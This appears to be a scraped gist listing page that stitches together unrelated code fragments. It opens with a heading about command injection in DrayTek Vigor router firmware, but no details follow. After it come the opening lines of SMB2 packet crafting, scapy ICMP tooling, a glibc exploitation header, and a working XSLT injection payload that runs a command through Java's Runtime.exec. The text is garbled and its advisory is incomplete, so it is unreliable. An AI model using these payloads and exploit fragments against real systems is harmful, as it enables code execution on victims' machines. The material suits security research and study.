Vigor2960 fw1.5.1.1RC3 (r8167) Vigor3900 fw1.5.1.1beta_r8167
There are some command injection vulnerabilities in the mainfunction.cgi file. The details are as follows:
1. in downlaod_ovpn function
param($port, $op='open', $protocol='tcp') | |
#Remove Firewall Exception Rules | |
Function removeFirewall(){ | |
Invoke-Expression "Remove-NetFireWallRule -DisplayName 'WSL 2 Firewall Unlock *' "; | |
Invoke-Expression "netsh interface portproxy reset"; | |
} | |
# author: @leommxj @swing | |
import socket, struct, sys, time | |
from functools import reduce | |
class Smb2Header: | |
def __init__(self, command, message_id): | |
self.protocol_id = "\xfeSMB" | |
self.structure_size = "\x40\x00" # Must be set to 0x40 | |
self.credit_charge = "\x00"*2 |
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
#author:swing | |
from scapy.all import * | |
ICMP_MS_SYNC_REQ_TYPE = 0xa5 | |
ICMP_MS_SYNC_RSP_TYPE = 0xa6 | |
def keep_icmp_handler(func): |
from scapy.all import * | |
from scapy.layers.http import * | |
import gdb | |
class ShowProcto(gdb.Command): | |
""" | |
Usage: xpr/size memaddr procto_type | |
Exaple: | |
(gdb) xpr/20 0x7fffffffe238 TCP |
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <string.h> | |
/* | |
author: swing @ bestswngs@gmail.com | |
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a | |
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux | |
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue |
/* INSTALL: | |
* | |
* Put this file under the respective directory. | |
* Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css | |
* Linux & MacOS: ~/.idapro/themes/monokai/theme.css | |
* | |
* In Options -> Colors change theme to monokai | |
* | |
* */ | |
@importtheme "dark"; |
#!/usr/bin/env python3 | |
import docker | |
import os | |
import platform | |
import logging | |
import argparse | |
from distutils.dir_util import mkpath | |
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
<xsl:template> | |
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
<!-- #114 Utf8: open -a calculator --> | |
<!-- #115 String: touch /tmp/pwn --> | |
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
<!-- #132 Utf8: <init> --> | |
<AAA select="<init>"/> |
import magic | |
import r2pipe | |
import hashlib | |
import argparse | |
import subprocess | |
from unicorn import * | |
from unicorn.x86_const import * | |
# from udbserver import * # uncomment this line if you want to debug | |
def pad_size(size): |